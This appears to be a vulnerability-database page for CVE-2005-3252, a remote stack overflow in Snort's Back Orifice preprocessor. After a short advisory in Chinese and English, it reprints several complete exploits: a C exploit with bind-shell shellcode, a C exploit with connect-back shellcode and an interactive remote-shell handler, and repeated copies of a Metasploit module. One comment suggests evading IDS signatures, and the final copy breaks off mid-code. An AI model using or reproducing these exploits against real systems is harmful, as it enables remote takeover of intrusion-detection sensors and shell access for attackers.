CVE-2005-3252
CVSS7.5
发布时间 :2005-10-18 17:02:00
修订时间 :2011-03-07 21:26:07
NMCOEP    

[原文]Stack-based buffer overflow in the Back Orifice (BO) preprocessor for Snort before 2.4.3 allows remote attackers to execute arbitrary code via a crafted UDP packet.


[CNNVD]Snort Back Orifice预处理器远程栈溢出漏洞(CNNVD-200510-133)

        Snort是广泛部署的开放源码网络入侵检测系统(IDS)。很多其他IDS产品中也使用了Snort及其组件。
        Snort的Back Orifice ping预处理模块存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在Snort探测器上执行任意指令。
        Snort预处理器是一些模块化的插件,通过在运行检测引擎前操作报文来扩展功能。Back Orifice预处理器解码报文以判断报文中是否包含有Back Orifice ping消息。ping检测代码未能充分的限制从报文中读取到固定长度缓冲区中数据的数量,这样导致可能出现缓冲区溢出。
        攻击者可以通过发送单个特制的UDP报文导致在目标系统上执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sourcefire:snort:2.4.0
cpe:/a:sourcefire:snort:2.4.2
cpe:/a:sourcefire:snort:2.4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3252
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3252
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-133
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA05-291A.html
(VENDOR_ADVISORY)  CERT  TA05-291A
http://www.kb.cert.org/vuls/id/175500
(VENDOR_ADVISORY)  CERT-VN  VU#175500
http://xforce.iss.net/xforce/alerts/id/207
(VENDOR_ADVISORY)  ISS  20051018 Snort Back Orifice Parsing Remote Code Execution
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=
(UNKNOWN)  CONFIRM  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=
(UNKNOWN)  CONFIRM  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=
http://www.vupen.com/english/advisories/2005/2138
(UNKNOWN)  VUPEN  ADV-2005-2138
http://www.snort.org/docs/change_logs/2.4.3/Changelog.txt
(UNKNOWN)  CONFIRM  http://www.snort.org/docs/change_logs/2.4.3/Changelog.txt
http://www.securityfocus.com/bid/15131
(UNKNOWN)  BID  15131
http://www.osvdb.org/20034
(UNKNOWN)  OSVDB  20034
http://securitytracker.com/id?1015070
(UNKNOWN)  SECTRACK  1015070
http://secunia.com/advisories/17559
(UNKNOWN)  SECUNIA  17559
http://secunia.com/advisories/17255
(UNKNOWN)  SECUNIA  17255
http://secunia.com/advisories/17220
(UNKNOWN)  SECUNIA  17220
http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0010.html
(UNKNOWN)  FULLDISC  20051101 Snort Back Orifice Preprocessor Exploit (Win32 targets)
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0505.html
(UNKNOWN)  FULLDISC  20051025 Snort's BO pre-processor exploit

- 漏洞信息

Snort Back Orifice预处理器远程栈溢出漏洞
高危 缓冲区溢出
2005-10-18 00:00:00 2006-08-24 00:00:00
远程  
        Snort是广泛部署的开放源码网络入侵检测系统(IDS)。很多其他IDS产品中也使用了Snort及其组件。
        Snort的Back Orifice ping预处理模块存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在Snort探测器上执行任意指令。
        Snort预处理器是一些模块化的插件,通过在运行检测引擎前操作报文来扩展功能。Back Orifice预处理器解码报文以判断报文中是否包含有Back Orifice ping消息。ping检测代码未能充分的限制从报文中读取到固定长度缓冲区中数据的数量,这样导致可能出现缓冲区溢出。
        攻击者可以通过发送单个特制的UDP报文导致在目标系统上执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        Snort Project Upgrade snort-2.4.3.tar.gz
        http://www.snort.org/dl/current/snort-2.4.3.tar.gz

- 漏洞信息 (1272)

Snort <= 2.4.2 Back Orifice Parsing Remote Buffer Overflow Exploit (EDBID:1272)
linux remote
2005-10-25 Verified
0 rd
N/A [点击下载]
/*
 * THCsnortbo 0.3 - Snort BackOrifice PING exploit
 * by rd@thc.org
 * THC PUBLIC SOURCE MATERIALS
 * 
 * Bug was found by Internet Security Systems 
 * http://xforce.iss.net/xforce/alerts/id/207
 *
 * v0.3	- removed/cleaned up info for public release
 * v0.2 - details added, minor changes
 * v0.1 - first release
 * 
 * Greetz to all guests at THC's 10th 
 * Anniversary (TAX) :>
 * 
 * $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
 *
 */

/* 
 * DETAILS
 *
 * The bug is in spp_bo.c, BoGetDirection() function
 * static int BoGetDirection(Packet *p, char *pkt_data) {
 *   u_int32_t len = 0;
 *   u_int32_t id = 0;
 *   u_int32_t l, i;
 *   char type;
 *   char buf1[1024];
 *   
 *   ...
 *   buf_ptr = buf1;
 *   ...
 *   while ( i < len ) {
 *      plaintext = (char) (*pkt_data ^ (BoRand()%256));
 *      *buf_ptr = plaintext;
 *      i++;
 *      pkt_data++;
 *      buf_ptr++;
 *
 * len is taken from the BO packet header, so its a buffer 
 * overflow when len > buf1 size.
 * 
 * The exchange of data between the BO client and server is 
 * done using encrypted UDP packets
 * 
 * BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html)
 * Mnemonic 	Size in bytes
 * MAGIC 	8
 * LEN		4
 * ID		4
 * T		1
 * DATA 	variable
 * CRC 		1
 *
 * On x86, because of the stack layout, we end up overwriting 
 * the loop counter (i and len). To solve this problem, we 
 * can set back the approriate value for i and len. We can 
 * also able to set a NULL byte to stop the loop. 
 *
 * There is no chance for bruteforce, snort will die after the 
 * first bad try. On Linux system with kernel 2.6 with VA 
 * randomized, it would be much harder for a reliable exploit.
 *
 * 
 * In case of _non-optimized_ compiled snort binary, the stack 
 * would looks like this:
 *
 * [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data]
 * 
 * The exploit could be reliable in this case, by using a 
 * pop/ret return addess. Lets send to snort a UDP packet 
 * as the following:
 *
 * [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ]
 * [                     Encrypted                        ][   Non Encrypted  ]
 *
 * When the overwriting loop stop, pkt_data will point to 
 * the memory after return address (NOP part) in raw packet 
 * data. So, using a return address that points to POP/RET 
 * instructions would be enough for a reliable exploit.
 * (objdump -d binary|grep -B1 ret|grep -A1 pop to find one)
 * 
 * This method will work well under linux kernel 2.6 with VA 
 * randomized also.
 * 
 * In case of optimized binary, it would be harder since
 * the counter i, len and buffer pointers could/possibly be 
 * registered variables. And the register points to buffer 
 * get poped from stack when the funtion return. In this case, 
 * the return address should be hard-coded but it would be 
 * unreliable (especially on linux kernel 2.6 with VA 
 * randomization patch).
 *
 * This exploit would generally work. Providing that you know
 * how to find and use correct offsets and return address :>
 *
 *  
 * Example:
 * 
 * $ ./THCsnortbo
 * Snort BackOrifice PING exploit (version 0.3)
 * by rd@thc.org
 *
 * Usage: ./THCsnortbo host target
 *
 * Available Targets:
 *   1 | manual testing gcc with -O0
 *   2 | manual testing gcc with -O2
 *     
 * $ ./snortbo 192.168.0.101 1
 * Snort BackOrifice PING exploit (version 0.3)
 * by rd@thc.org
 *
 * Selected target:
 *   1 | manual testing gcc with -O0
 *   
 * Sending exploit to 192.168.0.101
 * Done.
 *
 * $ nc 192.168.0.101 31337
 * id
 * uid=104(snort) gid=409(snort) groups=409(snort)
 * uname -sr
 * Linux 2.6.11-hardened-r1
 * 
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h> 
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_TIME_H
#include <sys/time.h>
#endif
#ifdef HAVE_SYS_SELECT_H
#include<sys/select.h>
#endif
#ifdef HAVE_STRINGS_H
#include<strings.h>
#endif
#ifdef HAVE_MALLOC_H
#include <malloc.h>
#endif
#include <netdb.h>
#include <string.h>
#include <ctype.h>

#define VERSION "0.3"

/* shellcodes */
 
/* a quick test bind shellcode on port 31337 from metasploit
 * 
 * Connect back shellcode for snort exploit should be better, do 
 * it by yourself. im lazy :>
 */
unsigned char x86_lnx_bind[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

typedef struct {
	char 		*desc;		// description
	unsigned char	*scode;		// shellcode
	unsigned int	scode_len;	
	unsigned long	retaddr;	// return address
	unsigned int	i_var_off;	// offset from buf1 to variable 'i'
	unsigned int	len_var_off;	// offset from buf1 to variable 'len'
	unsigned int    ret_off;	// offset from buf1 to saved eip
	unsigned int	datasize; 	// value of size field in BO ping packet
} t_target;

t_target targets[] = {
	{
	"manual testing gcc with -O0",
	x86_lnx_bind, sizeof(x86_lnx_bind),
	//0x0804aa07, 
	0x4008f000+0x16143,	// pop/ret in libc
	1024+1+32, 1024+1+44, 1024+1+60,
	0xFFFFFFFF
	},
	{
	"manual testing gcc with -O2",
	x86_lnx_bind, sizeof(x86_lnx_bind),
	0x0804aa07, //0xbfffe9e0 
	1024+1+8, 1024+1+20, 1024+1+44,
	1048+4+24
	},
	{ NULL, NULL, 0, 0, 0, 0, 0, 0 }
};

#define PACKETSIZE 1400	
#define OVERFLOW_BUFFSZ 1024
#define IVAL 0x11223344;
#define LVAL 0x11223354+16;

#define ARGSIZE 256
#define PORT 53
#define MAGICSTRING "*!*QWTY?"
#define MAGICSTRINGLEN 8
#define TYPE_PING 0x01

static long holdrand = 1L;
char g_password[ARGSIZE];
int port = PORT;

/* 
 * borrowed some code from BO client
 */
void  msrand (unsigned int seed )
{
	holdrand = (long)seed;
}

int mrand ( void)
{ 
	return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}

unsigned int getkey()
{
	int x, y;
	unsigned int z;

	y = strlen(g_password);
	if (!y)
		return 31337;
	else {
		z = 0;
		for (x = 0; x < y; x++)
		z+= g_password[x];
    
		for (x = 0; x < y; x++) {
			if (x%2)
				z-= g_password[x] * (y-x+1);
			else
				z+= g_password[x] * (y-x+1);
			z = z%RAND_MAX;
      		}
		
		z = (z * y)%RAND_MAX;
    		return z;
  	}
}

void BOcrypt(unsigned char *buff, int len)
{
	int y;
  
	if (!len)
		return;
  
	msrand(getkey());
	for (y = 0; y < len; y++)
		buff[y] = buff[y] ^ (mrand()%256);
}

void explbuild(unsigned char *buff, t_target *t)
{
	unsigned char *ptr;
	unsigned long *pdw;
	unsigned long size;
	unsigned char   *scode;	
        unsigned int    scode_len;
        unsigned long   retaddr;
	unsigned int    i_var_off;
	unsigned int    len_var_off;
	unsigned int    ret_off;
	unsigned int    datasize;

	scode = t->scode;
	scode_len = t->scode_len;
	retaddr = t->retaddr;
	i_var_off = t->i_var_off;
	len_var_off = t->len_var_off;
	ret_off = t->ret_off;
	datasize = t->datasize;

	memset(buff, 0x90, PACKETSIZE); 
	buff[PACKETSIZE - 1] = 0;
	
	strcpy(buff, MAGICSTRING);
 
	pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
    	*pdw++ = datasize;
      	*pdw++ = (unsigned long)-1;
         ptr = (unsigned char *)pdw;
	*ptr++ = TYPE_PING;

	size = IVAL;
	memcpy(buff + i_var_off, &size, 4);
	size = LVAL;
	memcpy(buff + len_var_off, &size, 4); 

	memcpy(buff + ret_off, &retaddr, 4);

	/* you may want to place shellcode on encrypted part and will
	 * be decrypted into buf1 by BoGetDirection
	 */
	// memcpy(buff + OVERFLOW_BUFFSZ - scode_len - 128, 
	//		(char *) scode, scode_len);

	memcpy(buff + PACKETSIZE - scode_len - 1, (char *)scode, scode_len);

	/* you may want to set NULL byte to stop the loop here, but it 
	 * won't work with pop/ret method
	 */
	// buff[ret_off + 4] = 0;

  	size = ret_off + 4;
  	BOcrypt(buff, (int)size);
}

int sendping(unsigned long dest, int port, int sock, unsigned char *buff)
{
	struct sockaddr_in host;
	int i, size;
	fd_set fdset;
	struct timeval tv;
	
	size=PACKETSIZE;
	host.sin_family = AF_INET;
	host.sin_port = htons((u_short)port);
	host.sin_addr.s_addr = dest;
  
	FD_ZERO(&fdset);
	FD_SET(sock, &fdset);
	tv.tv_sec = 10;
	tv.tv_usec = 0;

	i = select(sock+1, NULL, &fdset, NULL, &tv);
	if (i == 0) {
		printf("Timeout\n");
		return(1);
	} else if (i < 0) {
		perror("select: ");
		return(1);
	}

	if ( (sendto(sock, buff, size, 0, 
		(struct sockaddr *)&host, sizeof(host))) != size ) {
		perror("sendto: ");
		return(1);
	}

	return 0;
}

void usage(char *prog) 
{
	int n;
	  
	printf("Usage: %s host target\n\nAvailable Targets:\n", prog);
	
	for (n = 0 ; targets[n].desc != NULL ; n++) 
  		printf ("%3d | %s\n", n + 1, targets[n].desc);
	printf ("    \n");
}


int main(int argc, char **argv)
{
	struct in_addr hostin;
	unsigned long dest;
	char buff[PACKETSIZE];
	int ntarget;
   
	printf("Snort BackOrifice PING exploit (version "VERSION")\n"
		"by rd@thc.org\n\n");

	if (argc < 3 || ((ntarget = atoi(argv[2])) <= 0) ) {
		usage(argv[0]);
		return 0;
	}

	if (ntarget >= (sizeof(targets) / sizeof(t_target))) {
		printf ("WARNING: target out of list. list:\n\n");
		usage(argv[0]);
		return 0;
	}					

	ntarget = ntarget - 1;

	// change the key here to avoid the detection of a simple 
	// packet matching IDS signature.
	g_password[0] = 0;

	if ( (dest = inet_addr(argv[1])) == (unsigned long)-1)
		printf("Bad IP: '%s'\n", argv[1]);
	else {
		int s;
		hostin.s_addr = dest;
		s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);

		printf("Selected target:\n%3d | %s\n", ntarget+1, 
				targets[ntarget].desc);
		explbuild(buff, &targets[ntarget]);

		printf("\nSending exploit to %s\n", inet_ntoa(hostin));
		if (sendping(dest, port, s, buff))
			printf("Sending exploit failed for dest %s\n", 
					inet_ntoa(hostin));
		printf("Done.\n");
	}

	return 0;
}

// milw0rm.com [2005-10-25]
		

- 漏洞信息 (1313)

Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3) (EDBID:1313)
windows remote
2005-11-11 Verified
0 xort
N/A [点击下载]
/*
 * snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
 *  
 *              by Russell Sanford (xort@tty64.org)
 *                  -> www.code-junkies.net <-
 *
 *        Date: Nov 11, 2005
 *
 * Discription: A buffer overflow exist in the snort pre-preprocessor
 *		designed to detect encrypted Back Orifice ping packets
 *		on a network. The overflow occurs as a result of a field 
 *	 	size read directly from the data within that packet
 *	 	inwhich	an attacker can specify.
 *
 *	Credit: ISS XFORCE (great work as always)
 *
 * Information: CERT TA05-291A
 *
 *     Respect: Pull The Plug & DARPA Net Communities
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>

#define buffsize 1056
#define COOKIE   "*!*QWTY?"

typedef struct {
	char   magic[8];
	int         len;
	int          id;
	char       type;
	char data[buffsize];
	char        crc;
} BOHEADER;

char        buffer[buffsize+5000];
static long              holdrand = 31337L;
unsigned int          ret_address = 0xbfffebad;

// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
char shellcode[] =
"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
"\x45\xc4\x34\x1e" // IP-A
"\x81\x04\x24"
"\x01\x01\x01\x01" // IP-B 
"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0"
"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0"
"\x0b\xcd\x80\xeb\xfe";

int mrand (void) {
       	return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}

void timeout(int sig_num) { 
	printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n");
	exit(1);
}

int main(int argc, char **argv) {

	signal(SIGALRM,timeout);	

	int s, z, i, len_inet, IP_a, IP_b, l, sent;
	char *server_addr=argv[1];
	char  *local_addr=argv[2];
	char     buf[512];
	struct sockaddr_in adr_srvr, adr, loc_adr;
        fd_set  rfds, wfds;

	printf("\n\t,------------------------------------------------------------,\n"
	         "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n"
	         "\t|           by Russell Sanford - xort@tty64.org              |\n"
	         "\t`------------------------------------------------------------`\n\n");

	/* 
	 * Check for Valid Input
	 */
	
	if (argc < 3) {
		printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n");
		
		exit(1);
	}	

	/*
	 * Fix up Safe Values for connect back shellcode 
	 */
	
	IP_a = inet_addr(argv[2]);
	IP_b = 0;

	printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]);

	do {
		IP_a -= 0x01010101;	IP_b += 0x01010101;
	}
	while (  ((IP_a & 0x000000ff) == 0) || 
                 ((IP_a & 0x0000ff00) == 0) || 
		 ((IP_a & 0x00ff0000) == 0) ||
		 ((IP_a & 0xff000000) == 0) );

	*(int *)&shellcode[19] = IP_a;
	*(int *)&shellcode[26] = IP_b;

	/*
	 * Create And Fill In Header Info
	 */

	printf(" [x] Creating Evil Packet.\n");

	BOHEADER evil_packet;

	memcpy(evil_packet.magic,COOKIE,8); 
	evil_packet.len  =  (buffsize+38); //1094
	evil_packet.id   = 0xbadc0ded;
        memset(evil_packet.data, 0x90, buffsize);
	memcpy(&evil_packet.data[buffsize-300],shellcode,90);
	evil_packet.type = 0x1;
	evil_packet.crc  = 0x43;

	printf(" [x] Using Return Address: 0x%.8x.\n",ret_address);

	*(int *)&evil_packet.data[buffsize-4] = ret_address;

	/*
	 * Encrypt Evil Packet
	 */

	printf(" [x] Encrypting Packet.\n");

	memcpy(buffer,&evil_packet,(18+buffsize));
	for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); }

	/*
	 * Set Up Socket To Send UDP Packet 
	 */

	printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]);
		
	memset(&adr_srvr,0,sizeof adr_srvr);
	adr_srvr.sin_family = AF_INET;
	adr_srvr.sin_port = htons(9000);
	adr_srvr.sin_addr.s_addr = inet_addr(server_addr);
	len_inet = sizeof adr_srvr;

	s = socket(AF_INET,SOCK_DGRAM,0);
	
	if ( s == -1 ) {
		printf(" [-] Failed to Create Socket. Exiting...\n");
		exit(1);
	}

	/* 
	 * Send Packet
	 */

	printf(" [x] Sending Packet.\n");

	z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet);

	if ( z == -1 ) {
		printf(" [-] Failed to Send Packet. Exiting...\n");
		exit(1);
	}

	/*
	 * Listen For Connect Back Shellcode
	 */
	 
	 printf(" [x] Listening for Connect Back Shellcode.\n");

 	 s = socket(AF_INET,SOCK_STREAM,0);

 	 if ( s == -1 ) {
		printf(" [-] Failed to Create Socket. Exiting...\n");
		exit(1);
	 }

	 memset(&adr,0,sizeof adr);
	 adr.sin_family = AF_INET;
	 adr.sin_port = htons(21);
	 adr.sin_addr.s_addr = INADDR_ANY;

	 z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr));
	
	 if ( z == -1 ) {
		printf(" [-] Failed to Bind Socket. Exiting...\n");
		exit(1);
	 }

	 alarm(30);	// Set alarm so code can time out
	 listen(s,4);

	 int sin_size = sizeof(struct sockaddr_in);
	 int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size);

    	 alarm(0);	

	 if (new_fd == -1 ) {
		 printf(" [-] Failed to Accept Connection. Exiting...\n");
		 exit(1);
	 }

	 printf(" [x] Connection Established! Exploit Successful.\n\n");

         write(new_fd,"uname -a\nid\n",12);

	 /*
	  * Establish Connection. (ripped)
	  */

         while (1) {
                FD_SET (0, &rfds);
                FD_SET (new_fd, &rfds);
                FD_SET (new_fd, &wfds);

                select (new_fd + 1, &rfds, NULL, NULL, NULL);

                if (FD_ISSET (0, &rfds)) {
                        l = read (0, buf, sizeof (buf));
                        if (l <= 0) {
                                exit (EXIT_FAILURE);
                        }
                        sent=0;
                        while (!sent) {
                                select (new_fd+1, NULL, &wfds, NULL, NULL);
                                if (FD_ISSET(new_fd, &wfds)) {
                                        write(new_fd, buf, l);
                                        sent=1;
                                }
                        }
                }

                if (FD_ISSET (new_fd, &rfds)) {
                        l = read (new_fd, buf, sizeof (buf));
                        if (l == 0) {
                                fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n");
                                exit (EXIT_FAILURE);
                        } else if (l < 0) {
                                exit (EXIT_FAILURE);
                        }
                        write (1, buf, l);
                }
        }

	return 0;
}

// milw0rm.com [2005-11-11]
		

- 漏洞信息 (10026)

Snort 2.4.0 - 2.4.3 Back Orifice Pre-Preprocessor Remote Exploit (EDBID:10026)
linux remote
2005-10-18 Verified
9080 KaiJern Lau
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
			'Description'    => %q{
				This module exploits a stack overflow in the Back Orifice pre-processor module
			included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could 
			be used to completely compromise a Snort sensor, and would typically gain an attacker
			full root or administrative privileges.
			},
			'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
				],
			'Payload'        =>
				{
					'Space'    => 1073, #ret : 1069 
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'      => 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0))
	

		# Configure the default port to be 9080
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)

	end

	def msrand(seed)
		@holdrand = 31337
		end

	def mrand()
		return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
		end

	def bocrypt(takepayload)

		@arrpayload = (takepayload.split(//))

		encpayload = ""
		@holdrand=0
		msrand(0)

		@arrpayload.each do |c|
			encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
		end

		return encpayload
		end


	def exploit
		connect_udp
		
		boheader =      
			"*!*QWTY?"  +
			[1096].pack("V")  +           # Length ,thanx Russell Sanford
			"\xed\xac\xef\x0d"+           # ID
			"\x01"                        # PING
		
		filler =
			make_nops(1069 -(boheader.length + payload.encode.length))

		udp_sock.write(
			bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
		)
		
		handler
		disconnect_udp
	end

end
		

- 漏洞信息 (16834)

Snort Back Orifice Pre-Preprocessor Remote Exploit (EDBID:16834)
linux remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: snortbopre.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Back Orifice pre-processor module
				included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
				be used to completely compromise a Snort sensor, and would typically gain an attacker
				full root or administrative privileges.
			},
			'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
				],
			'Payload'        =>
				{
					'Space'    => 1073, #ret : 1069
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'      => 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Oct 18 2005'))

		# Configure the default port to be 9080
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)
	end

	def msrand(seed)
		@holdrand = 31337
		end

	def mrand()
		return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
		end

	def bocrypt(takepayload)

		@arrpayload = (takepayload.split(//))

		encpayload = ""
		@holdrand=0
		msrand(0)

		@arrpayload.each do |c|
			encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
		end

		return encpayload
		end


	def exploit
		connect_udp

		boheader =
			"*!*QWTY?"  +
			[1096].pack("V")  +           # Length ,thanx Russell Sanford
			"\xed\xac\xef\x0d"+           # ID
			"\x01"                        # PING

		filler =
			make_nops(1069 -(boheader.length + payload.encode.length))

		udp_sock.write(
			bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
		)

		handler
		disconnect_udp
	end

end
		

- 漏洞信息 (F82239)

Snort Back Orifice Stack Overflow (PacketStormID:F82239)
2009-10-27 00:00:00
Lau KaiJern  
exploit,overflow,root
CVE-2005-3252
[点击下载]

This Metasploit module exploits a stack overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
			'Description'    => %q{
				This module exploits a stack overflow in the Back Orifice pre-processor module
			included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could 
			be used to completely compromise a Snort sensor, and would typically gain an attacker
			full root or administrative privileges.
			},
			'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
				],
			'Payload'        =>
				{
					'Space'    => 1073, #ret : 1069 
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'      => 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0))
	

		# Configure the default port to be 9080
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)

	end

	def msrand(seed)
		@holdrand = 31337
		end

	def mrand()
		return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
		end

	def bocrypt(takepayload)

		@arrpayload = (takepayload.split(//))

		encpayload = ""
		@holdrand=0
		msrand(0)

		@arrpayload.each do |c|
			encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
		end

		return encpayload
		end


	def exploit
		connect_udp
		
		boheader =      
			"*!*QWTY?"  +
			[1096].pack("V")  +           # Length ,thanx Russell Sanford
			"\xed\xac\xef\x0d"+           # ID
			"\x01"                        # PING
		
		filler =
			make_nops(1069 -(boheader.length + payload.encode.length))

		udp_sock.write(
